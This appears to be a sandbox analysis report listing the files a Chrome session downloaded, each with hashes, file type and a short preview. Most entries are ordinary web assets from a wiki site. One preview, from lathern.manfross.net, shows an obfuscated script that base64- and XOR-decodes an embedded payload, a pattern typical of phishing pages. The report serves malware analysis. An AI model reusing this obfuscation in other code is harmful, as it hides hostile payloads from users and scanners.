                                                      URL:https://beta.slimwiki.com/_next/static/chunks/5086-7090b0403327d678.js
                                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5086],{15057:function(e,t){"use strict";t.Z=function(e,t){if(e&&t){var n=Array.isArray(t)?t:t.split(","),r=e.name||"",i=(e.type||"").toLowerCase(),o=i.replace(/\/.*$/,"");return n.some(function(e){var t=e.trim().toLowerCase();return"."===t.charAt(0)?r.toLowerCase().endsWith(t):t.endsWith("/*")?o===t.replace(/\/.*$/,""):i===t})}return!0}},24950:function(e){e.exports=function(e,t){for(var n,r=-1,i=e.length;++r<i;){var o=t(e[r]);void 0!==o&&(n=void 0===n?o:n+o)}return n}},90703:function(e,t,n){var r=n(49452),i=n(24950);e.exports=function(e,t){return e&&e.length?i(e,r(t,2)):0}},48541:function(e,t,n){"use strict";n.d(t,{Z:function(){return r}});/**. * @license lucide-react v0.376.0 - ISC. *. * This source code is licensed under the ISC license.. * See the LICENSE file in the root directory of this source tree.. */let r=(0,n(57977).Z)("AlignCenter",[["line",{x1:"21",x2:"3",y1:"6",y2:"6",key:"1fp77t"}],["line",{x1:"17",x2:"7",y1:"12",y2
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:SVG Scalable Vector Graphics image
                                                      Category:downloaded
                                                      Size (bytes):2931
                                                      Entropy (8bit):4.902226387132382
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:31AA8999AC1348F2D3A823DCC79102DF
                                                      SHA1:98C93D4AC3CF9F62265424360705EC6A1B267412
                                                      SHA-256:07820566E10F506826A05A98FE3B97B4778B1D71FD68E9AEECA691E58E08B378
                                                      SHA-512:F8D5ED78F357302690ADBC9FB4DEABC9D70E7B027E782295D39900EAD0297E4B8BCAD866678F73225E2322694A767C351D1FBFC6016861B23C393DB185D1DD68
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/media/logo-feather.13cce929.svg
                                                      Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="28px" height="28px" viewBox="0 0 28 28" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. Generator: sketchtool 61.2 (101010) - https://sketch.com -->. <title>4C273F90-C7CF-499C-B6E5-D55FF121F29A</title>. <desc>Created with sketchtool.</desc>. <defs>. <linearGradient x1="99.8146517%" y1="0%" x2="0.185348343%" y2="100%" id="linearGradient-1">. <stop stop-color="#6DDAD0" offset="0%"></stop>. <stop stop-color="#0096FF" offset="63.803412%"></stop>. <stop stop-color="#005FCB" offset="100%"></stop>. </linearGradient>. </defs>. <g id="Pages" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <g id="Pages-/-More" transform="translate(-26.000000, -22.000000)" fill="url(#linearGradient-1)">. <g id="Component-/-Sidebar-/-Navigation">. <g id="Graphic-/-Logo" transform="translate(20.000000,
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:HTML document, ASCII text, with very long lines (1445), with CRLF line terminators
                                                      Category:downloaded
                                                      Size (bytes):1812
                                                      Entropy (8bit):6.049493399579897
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:6A9ACDC9D3C57749A25AE924E292D4AF
                                                      SHA1:A4D1708182861F440A45163DAE8554C423DA2BC3
                                                      SHA-256:FBDA927350E818A32CEEBB166AAADCEDFB340C72948FF3EAED8E02D5A0FE2B35
                                                      SHA-512:1F6353DFCF64DA07416B9094BCD75C5DE47DCE68C6D1805626C4ACEEB95A5D260EF8E139E860FF91B43D3084020258C2B1E59D3096A1F128A263CAC2F7C899E1
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://lathern.manfross.net/rFfYEQ/
                                                      Preview:<script>..function pQrZTBaknh(mvtkHyAnFF, IactihDJUb) {..let ZkiuQuVFQM = '';..mvtkHyAnFF = atob(mvtkHyAnFF);..let iUHTxJZBhg = IactihDJUb.length;..for (let i = 0; i < mvtkHyAnFF.length; i++) {.. ZkiuQuVFQM += String.fromCharCode(mvtkHyAnFF.charCodeAt(i) ^ IactihDJUb.charCodeAt(i % iUHTxJZBhg));..}..return ZkiuQuVFQM;..}..var CNDbGvQpKP = pQrZTBaknh(`V0NrIzE/BkIVTldDITEgbTVdGxcWGB07AiFPD0EHMyczPyVjA10CES4gOD58JQ5BCV4pPDUjJj9HA0hLV0MxJTwuG1sOHnoDESgcCShKOSEIYTs2JD0KVA8XFjl+cClAZRJBUHo9JSlyNmI4QVB6aXdwcm0dVxUFKCd3MiYiDhoABDUrfzw0Ox9XBx49BSd5e21SD0EcPD8nNTQjCH4RS1dDd3BybRISAhEuKj9weigdQEhQIURdcHJtTxJBUHo7MiQnPwESBxE2OjJrX0dPEkFQJ0RdLV9HBlRJKjUzMBwDBwRiDVBndHdycGQUP2tQeml3JzsjC10WXjYmNDEmJABcTxgoLDFwb20YWw8UNT55PD0uDkYIHzRnJzEmJQFTDBV6YndybW9PGUFSO2tsXVgwYjgIFnITOCo1AT54CiA2aXZtb21NEEgLV0N3cHJtBlRBWBAPLx4WChdqMCJyEzgqNQE+eAogNmB+cClAZRJBUHo/NiJyGgFoNDYpHBs9G21SEgAENSt/Cj03CH4wOjEZO3lpQGUSQVB6PzYicicVeRgHFis9EwZtUhJJJzQTAhYhGCNfKF43KCMzOmVAGjosLWd6DXkNNFNMChtkDWB/dEEfPFsGZwwxfzcuHztAd3AK
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:C source, Unicode text, UTF-8 text, with very long lines (35660), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):35708
                                                      Entropy (8bit):5.3508502432311005
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:D88AC7C2963D03A82E4896EAA208280F
                                                      SHA1:1AE0AFF5DF72F6479989F45063EBEF9470E9C613
                                                      SHA-256:D01CA2C871E683DC9AC72F3887FDC0FFA6D57A7D462DDBCB784FEF772573B16C
                                                      SHA-512:2E0AC961A86A27AFA6C323FC00C6E1535A95F5C46A164649DD64C5293AFD3726D6DE7B5D2C00DA67E4199570BAFD4ED2CA77855A06A180E152FFB6C35450CA90
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/1937-caa6d78a06aa04cb.js
                                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1937,4819],{30387:function(e,t,n){"use strict";n.d(t,{$:function(){return d}});var a=n(11176),r=n(70331),i=n.n(r),s=n(6668),o=n.n(s),c=n(64059),u=n(91337);class l{async verifySSODetails(e){return await (0,a.fk)().post("/api/v1/accounts/sso/verify",{slug:e})}async fetchLogoInfo(e){return(0,a.fk)().get("/api/v1/accounts/slug",{params:{slug:e,skipDomainCheck:!0}})}async fetchAccount(e){return await (0,a.fk)().get("/api/v1/accounts/".concat(e))}async fetchPublicAccountByDomain(e){return(0,a.fk)().get("/api/v1/accounts/public/".concat(e))}async validateAccountSlug(e,t){if(e&&t)return await (0,a.fk)().get("/api/v1/accounts/count?slug=".concat(t,"&accountId=").concat(e))}async validateAccountDomain(e,t){return await (0,a.fk)().get("/api/v1/accounts/count?domain=".concat(t,"&accountId=").concat(e))}async update(e,t){if(e&&t)return await (0,a.fk)().put("/api/v1/accounts/".concat(e),t)}async fetchBillingHistory(e,t){return await (0,a.fk)()
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 2446 x 899, 8-bit/color RGBA, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):70712
                                                      Entropy (8bit):6.94130504124589
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:F70FF06D19498D80B130EC78176FD3FF
                                                      SHA1:9D8A3B74C5164FF7AE2C7930B6D7B14707B404FC
                                                      SHA-256:DF6DBAB5251E56B405E48AAF57D3CD4188F073FFBA71131FA6CD26E6742923AE
                                                      SHA-512:543151693C3751A7E6B1B6A9EA77B83CFD049BC320EE75B666514076F4C0218E9DC23DA5E6C932B2B8670AA1BE1D4E9A91A889F5C6F0D7B9F9C9FE6694609B31
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:.PNG........IHDR................... .IDATx....q......!8.on.....{....4{..{U.A!x...t3P.~.S86...N....7USM....p.".?..>.G....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @.......
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (37457)
                                                      Category:downloaded
                                                      Size (bytes):51889
                                                      Entropy (8bit):6.555176608538828
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:2843C8D60621F29FFAF351317F3ACF87
                                                      SHA1:75A22CCBEF7391FE4490F1A20875C063AE17E9EC
                                                      SHA-256:55317F8A1F9EFD502C503B831317945F064730EF6FFFDD6077650C15D65A4C74
                                                      SHA-512:1D2D48D4D7730516309BBD24D07180EA44B9448E3CBF20F348722E4D26BCC36492F2ECE5F907B5AB49C9A2BD41313ED221328026CB42CEDAABED369439F46C8D
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/8779-d62f356a41bff933.js
                                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8779],{65058:function(e){e.exports=function(e,r,t){e=e||{};var i=r.prototype,a={future:"in %s",past:"%s ago",s:"a few seconds",m:"a minute",mm:"%d minutes",h:"an hour",hh:"%d hours",d:"a day",dd:"%d days",M:"a month",MM:"%d months",y:"a year",yy:"%d years"};function o(e,r,t,a){return i.fromToBase(e,r,t,a)}t.en.relativeTime=a,i.fromToBase=function(r,i,o,n,u){for(var s,d,l,c=o.$locale().relativeTime||a,p=e.thresholds||[{l:"s",r:44,d:"second"},{l:"m",r:89},{l:"mm",r:44,d:"minute"},{l:"h",r:89},{l:"hh",r:21,d:"hour"},{l:"d",r:35},{l:"dd",r:25,d:"day"},{l:"M",r:45},{l:"MM",r:10,d:"month"},{l:"y",r:17},{l:"yy",d:"year"}],f=p.length,h=0;h<f;h+=1){var m=p[h];m.d&&(s=n?t(r).diff(o,m.d,!0):o.diff(r,m.d,!0));var g=(e.rounding||Math.round)(Math.abs(s));if(l=s>0,g<=m.r||!m.r){g<=1&&h>0&&(m=p[h-1]);var x=c[m.l];u&&(g=u(""+g)),d="string"==typeof x?x.replace("%d",g):x(g,i,m.l,l);break}}if(i)return d;var y=l?c.future:c.past;return"function"==type
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (8214), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):8214
                                                      Entropy (8bit):5.382761679059955
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:5BEFF86FB2C595400FC743CBDD6BEDD0
                                                      SHA1:546AE5718ACBF66F8896D230CBCB25B1B394C864
                                                      SHA-256:75DD17C6BF9D7E3D4BDBDE451BD961B0E6B471B1B16863104E3A6380AD935A13
                                                      SHA-512:C82AC44E281388866074AFA0CA267EEBD26DB3CD65B1F271AE7D33DA16C867B7EAC3C6E7FD928CAFDD0BE1517B23A815AE9D940327EA0B2B008933F80B73DE19
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/6665-461e8e3dd30160ea.js
                                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6665],{96665:function(e,t,r){r.d(t,{ee:function(){return D},Eh:function(){return V},VY:function(){return B},fC:function(){return Y},D7:function(){return S}});var n=r(14749),o=r(2265),i=r(58610),l=r(54887);let a=e=>({name:"arrow",options:e,fn(t){let{element:r,padding:n}="function"==typeof e?e(t):e;return r&&({}).hasOwnProperty.call(r,"current")?null!=r.current?(0,i.x7)({element:r.current,padding:n}).fn(t):{}:r?(0,i.x7)({element:r,padding:n}).fn(t):{}}});var u="undefined"!=typeof document?o.useLayoutEffect:o.useEffect;function d(e,t){let r,n,o;if(e===t)return!0;if(typeof e!=typeof t)return!1;if("function"==typeof e&&e.toString()===t.toString())return!0;if(e&&t&&"object"==typeof e){if(Array.isArray(e)){if((r=e.length)!==t.length)return!1;for(n=r;0!=n--;)if(!d(e[n],t[n]))return!1;return!0}if((r=(o=Object.keys(e)).length)!==Object.keys(t).length)return!1;for(n=r;0!=n--;)if(!({}).hasOwnProperty.call(t,o[n]))return!1;for(n=
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format, TrueType, length 35970, version 1.0
                                                      Category:downloaded
                                                      Size (bytes):35970
                                                      Entropy (8bit):7.989503040923577
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:496B7BBDE91C7DC7CF9BBABBB3921DA8
                                                      SHA1:2BD3C406A715AB52DAD84C803C55BF4A6E66A924
                                                      SHA-256:AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
                                                      SHA-512:E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://lathern.manfross.net/12qNAKDzTY3787XkgWYop47
                                                      Preview:wOFF..............$ .......\...&............DSIG...T............GPOS..........N..B..GSUB...`.........3y.OS/2.......F...`i.{[cmap...X.......<.?+.cvt ......./...<)...fpgm............?...gasp................glyf..!t..Ra....$.ihead..s....3...6..}.hhea..t....!...$....hmtx..t0.......x?s.#loca..w.........LC%.maxp..{X... ... .5..name..{x..........post..~@........1+.,prep.............P..x..\.tU..;y...!..!..R.4."(."*".U..V.]3...r..5c...j....._.7U...H..1MSE...0b..b&.......%..w...}.{.......u...s..g..soBLD~.C.)n..1.Q...z.q. ..R..)n.QY.v..{.(...o...O.......G...{to.~.....,..#<.w...W...?6..3....2.)O........].`_a..F'.6..."}&..$'.K...a..NK$..01ar......-.Do_. .H.].x'{....n....{.|.L.p..u...-.w}.}...~.....(.zP:..^t.=D?..i9.....m.......AE.......J.....j......q&_...`....P....M<.o.[.V....H..Sx:...<.g.....x>/.......^..x9.....Ws...&.....x....jUJ...B.S...2(_...U...Q...<..y.j.y...P.x.:....m+..V.....5h[.~E.WL..rp....0..*Pu..$OA....LJ.Y.....9.e...L..... /"?.m.......+..J.........
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (10006), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):10006
                                                      Entropy (8bit):5.386205897014024
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:622D0D5317A6E60538D78D6E67732907
                                                      SHA1:AA582E625B80701D0E912ADFED96113464FFEDC3
                                                      SHA-256:C7257C9E1DDB78BE301D55E32633EA3A1201588A47BB7488FB71F465024AB1D2
                                                      SHA-512:50A1B0E1D610C5F517D1EFF9A14AA43F1FB33EB9E6A35CEB963E0C8F0A767E2F38FF4F6A99FF2262EAD07A6C064AD8CFABDD031CC5267285FBB873BF29D6ACC0
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/7480-ce62707b75908d27.js
                                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7480],{23783:function(e,t,r){r.d(t,{$l:function(){return o},BN:function(){return P},DY:function(){return E},Fs:function(){return W},J$:function(){return q},JN:function(){return R},LI:function(){return C},MA:function(){return H},PM:function(){return s},UG:function(){return Y},W6:function(){return k},i_:function(){return u},kY:function(){return z},ko:function(){return X},kw:function(){return L},mf:function(){return l},o8:function(){return a},qC:function(){return D},s6:function(){return Q},sj:function(){return M},u3:function(){return I},u_:function(){return $},w6:function(){return V},xD:function(){return ee}});var n=r(2265);let i=()=>{},u=i(),o=Object,a=e=>e===u,l=e=>"function"==typeof e,s=(e,t)=>({...e,...t}),c=e=>l(e.then),f=new WeakMap,d=0,g=e=>{let t,r;let n=typeof e,i=e&&e.constructor,u=i==Date;if(o(e)!==e||u||i==RegExp)t=u?e.toJSON():"symbol"==n?e.toString():"string"==n?JSON.stringify(e):""+e;else{if(t=f.get(e))re
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:C source, ASCII text, with very long lines (19543), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):19543
                                                      Entropy (8bit):5.372282658690911
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:CF79191D724C30EDB0A13A94B1B78A39
                                                      SHA1:5148C818DF8360192F1F05D898B7F86AB556ED3E
                                                      SHA-256:633DD168C2DD24225502773586D77DA87329B25AC45DBC684CF0DF9688053C28
                                                      SHA-512:53AEFA6409902A9B1E6427790C442A9001D10ACEDCAD8BCA3F8E3D8CA392ABAD2968E191CC7B6F74A8AEB43D746116A52FDFEC7D8B465498C535176994353E8F
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/app/%5Blocale%5D/layout-b6dbaf07385e096d.js
                                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1203],{71539:function(e,t,n){var r={"./en.json":[83,83]};function s(e){if(!n.o(r,e))return Promise.resolve().then(function(){var t=Error("Cannot find module '"+e+"'");throw t.code="MODULE_NOT_FOUND",t});var t=r[e],s=t[0];return n.e(t[1]).then(function(){return n.t(s,19)})}s.keys=function(){return Object.keys(r)},s.id=71539,e.exports=s},70655:function(e,t,n){Promise.resolve().then(n.bind(n,91845)),Promise.resolve().then(n.bind(n,37388)),Promise.resolve().then(n.bind(n,26016)),Promise.resolve().then(n.bind(n,68019)),Promise.resolve().then(n.bind(n,89971)),Promise.resolve().then(n.t.bind(n,85935,23)),Promise.resolve().then(n.t.bind(n,24831,23)),Promise.resolve().then(n.bind(n,68198)),Promise.resolve().then(n.t.bind(n,98403,23)),Promise.resolve().then(n.t.bind(n,63385,23)),Promise.resolve().then(n.bind(n,14160)),Promise.resolve().then(n.bind(n,68433)),Promise.resolve().then(n.bind(n,28045)),Promise.resolve().then(n.bind(n,16921)),Pro
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (1650), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):1650
                                                      Entropy (8bit):5.287372576750516
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:E650D85FD0E8863E8D46C525FAF5682A
                                                      SHA1:BE233DCD72AB4ECD145BC0DF6E4432F340D45094
                                                      SHA-256:880DFEF579AF22117E26DBF107FC8E7CA4BFB1DF899B23FD742A14BED5C41BD1
                                                      SHA-512:B2C68D51F0267E50603511D00B8312F261AA968C859681A6B2A0019A56F3FD7F8BD471293FD4B8746F9CEC2673733EBDD958EECACC63D64BD67A6364FD556937
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/app/%5Blocale%5D/share/%5BpageToken%5D/loading-93e547774d09d73a.js
                                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8670,2439,9788,6566,768,5292,7832,8224,3217,8538,7685,9432],{11704:function(e,t,i){Promise.resolve().then(i.t.bind(i,81749,23)),Promise.resolve().then(i.bind(i,72342)),Promise.resolve().then(i.bind(i,5654)),Promise.resolve().then(i.bind(i,7577)),Promise.resolve().then(i.bind(i,10103)),Promise.resolve().then(i.bind(i,97575)),Promise.resolve().then(i.bind(i,89658)),Promise.resolve().then(i.bind(i,35287))},72342:function(e,t,i){"use strict";i.r(t),t.default={src:"/_next/static/media/filetype-doc-normal.6eac6d78.svg",height:38,width:31,blurWidth:0,blurHeight:0}},5654:function(e,t,i){"use strict";i.r(t),t.default={src:"/_next/static/media/filetype-normal.db4dca8b.svg",height:38,width:31,blurWidth:0,blurHeight:0}},7577:function(e,t,i){"use strict";i.r(t),t.default={src:"/_next/static/media/filetype-pdf-normal.787c0e26.svg",height:38,width:31,blurWidth:0,blurHeight:0}},10103:function(e,t,i){"use strict";i.r(t),t.default={src:"/_next/sta
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (57926), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):57926
                                                      Entropy (8bit):5.342713580513155
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:F99036CA5E554A311264418F7E217770
                                                      SHA1:2D1DE4AE72329F774CE0CB81AFC7D8D480433672
                                                      SHA-256:BAB642B500C024083EED4E52D80ED1C3269F000E082CE1852EB1418445B95479
                                                      SHA-512:A347F353D279AB8EB5879A639BE76EFA42DF1F644791CA94F18A2F92B1DCED7C4BD14127EFFBBAFB448F7E0363508EE8AD3B58B582584050320027032819E4D2
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/7637-3f0ed02bbb34dffa.js
                                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7637],{81648:function(e,t,n){"use strict";n.d(t,{Z:function(){return g}});var r=n(57437),i=n(575),a=n(27367),l=n(79879),o=n(61973),s=n(76413),d=n(20421),c=n(25375),u=n(48448),h=n(22169),p=n(80037),m=n(20244),f=n(30982);function g(e){let t=d.u.use.currentPage(),n=c.u.use.currentWiki(),i=s.c.use.currentAccount();return t&&n&&i?(0,r.jsx)(v,{...e,page:t,wiki:n,account:i}):null}function v(e){let{toast:t}=(0,u.pm)(),n=(0,f.useTranslations)("page"),s=async()=>{if(e.disabled)return;let r="".concat(a.O.NEXT_PUBLIC_CLIENT_URL).concat((0,o.Z)(e.account.slug,e.wiki.slug,e.page));e.hash&&(r+="#".concat(e.hash)),await (0,l.Z)(r),t({title:n("page-link-copied"),icon:p.Z,variant:"success"})};return(0,r.jsx)(i.z,{className:(0,h.cn)("h-4 w-4 bg-transparent p-0 text-foreground hover:bg-transparent focus-visible:ring-0",e.className,{"cursor-auto":e.disabled}),variant:"ghost",onClick:s,title:"Copy link to this heading",children:(0,r.jsx)(m.Z,{})})}},2
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):231
                                                      Entropy (8bit):6.725074433303473
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:547988BAC5584B4608466D761E16F370
                                                      SHA1:C11BB71049702528402A31027F200184910A7E23
                                                      SHA-256:70E32B2DB3F079BB0295A85A0DB15ED9E5926294DD947938D6CFA595F5AB18B4
                                                      SHA-512:C4A76F6E94982D1CC02C2B67523A334E76BFDE525C1014D32DB9E7ECA0FA39A06F291ECFA94C8C6A49D488EA3ACF9C10DDF3CAD9515562010440863D0F08FBA3
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:.PNG........IHDR..............w=.....sRGB.........IDATHK...1...Z......... #$#..-.. $$3..H...q.x.>.x..yY.|.@h.......$.B/..*Ec...J.}.....Rl..^.......#-...f.6p.cJigf...G.<.!.z..>a.+j....&U.....E/.._.`.d...~_....7...4`....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (49389), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):49389
                                                      Entropy (8bit):5.606872663367119
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:70950C5409B029F6F82BCEDAA208E4D2
                                                      SHA1:FA837CD9F4BF15D5CEDC6D39C378432C9256C4D4
                                                      SHA-256:93C7EF9FB890FCE118400470D2DD26EE4DDA265A622B9235F9C98EBC0A74027F
                                                      SHA-512:BBABB6511AA9E870DA11C1BAAE2F91D45261414DB2EA831962E3977CB28E0DE9F2BD7E486CA7012E2FD449DC753624D3FE35D4C4F395B3BDFAF1D44445CF6EF2
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://beta.slimwiki.com/_next/static/chunks/982-c931d376f5260e6e.js
                                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[982],{34451:function(e,t,r){r.r(t),r.d(t,{ErrorCode:function(){return p},FormatError:function(){return ep},IntlMessageFormat:function(){return ev},InvalidValueError:function(){return em},InvalidValueTypeError:function(){return eE},MissingValueError:function(){return eg},PART_TYPE:function(){return m},default:function(){return ey},formatToParts:function(){return eT},isFormatXMLElementFn:function(){return eb}});var n,i,o,s,a,h,u,l,c,f,p,m,E=r(69703);function g(e){return e.type===u.literal}function b(e){return e.type===u.number}function T(e){return e.type===u.date}function d(e){return e.type===u.time}function v(e){return e.type===u.select}function y(e){return e.type===u.plural}function _(e){return e.type===u.tag}function H(e){return!!(e&&"object"==typeof e&&e.type===l.number)}function A(e){return!!(e&&"object"==typeof e&&e.type===l.dateTime)}(n=h||(h={}))[n.EXPECT_ARGUMENT_CLOSING_BRACE=1]="EXPECT_ARGUMENT_CLOSING_BRACE
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (1434), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):1434
                                                      Entropy (8bit):5.780814020328209
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:CAC624AB0C197840B2A21BE4B6F6CC58
                                                      SHA1:C4B8B421F6039CCB0421E814774789201138308D
                                                      SHA-256:CFCE45FEF72ED85DC66C57FD1FA7262F9686B08188832FBFCE26A7A467D455B0
                                                      SHA-512:15FAB78F7997A69C4C0A469893CC3D53D989C74736D4EFDE315005242B4545B4E8F694BEFF23D0899C59A6C3CD954F3905C7EAC4C438961931E12D666BB3A3BB
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://www.google.com/recaptcha/api.js
                                                      Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='Az520Inasey3TAyqLyojQa8MnmCALSEU29yQFW8dePZ7xQTvSt73pHazLFTK5f7SyLUJSo2uKLesEtEa9aUYcgMAAACPeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZyIsImV4cGlyeSI6MTcyNTQwNzk5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!=='control_1.1'){d.head.prepend(m)
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:SVG Scalable Vector Graphics image
                                                      Category:downloaded
                                                      Size (bytes):2905
                                                      Entropy (8bit):3.962263100945339
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:FE87496CC7A44412F7893A72099C120A
                                                      SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                      SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                      SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://lathern.manfross.net/wxtp9YLQTb0kBgoRyDVkLkm41He23tAmnHREaBoUhPEYXGDCh4ft90180
